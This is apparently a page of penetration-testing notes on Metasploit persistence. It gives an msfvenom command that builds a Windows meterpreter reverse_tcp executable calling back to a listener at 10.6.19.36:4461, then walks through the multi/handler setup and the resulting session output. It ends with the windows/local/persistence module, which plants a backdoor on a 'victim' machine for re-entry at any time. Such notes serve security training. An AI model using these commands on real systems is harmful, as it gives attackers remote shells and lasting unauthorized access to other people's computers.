Persistence

Metasploit

Use msfvenom to create the payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.6.19.36 LPORT=4461 -f exe -o lashe.exe

  • Upload file to victim machine

  • Start msfconsole

  • Execute:

msf > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 10.6.19.36
msf exploit(multi/handler) > set LPORT 4461
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

Run listener

msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.6.19.36:4461

  • Execute lashe.exe (our payload) in victim

  • We obtain the shell:

Background session

meterpreter > background
[*] Backgrounding session 1...

Use persistence module

msf exploit(multi/handler) > use exploit/windows/local/persistence
msf exploit(windows/local/persistence) >

Set background session

msf exploit(windows/local/persistence) > set session 1

Run persistence

If the system is shut down or reset for whatever reason you will lose your meterpreter session however by using the persistence module you create a backdoor into the system which you can access at any time using the metasploit multi handler and setting the payload to windows/meterpreter/reverse_tcp allowing you to send another meterpreter payload to the machine and open up a new meterpreter session.

PreviousPost ExplotationNextMimikatz

Last updated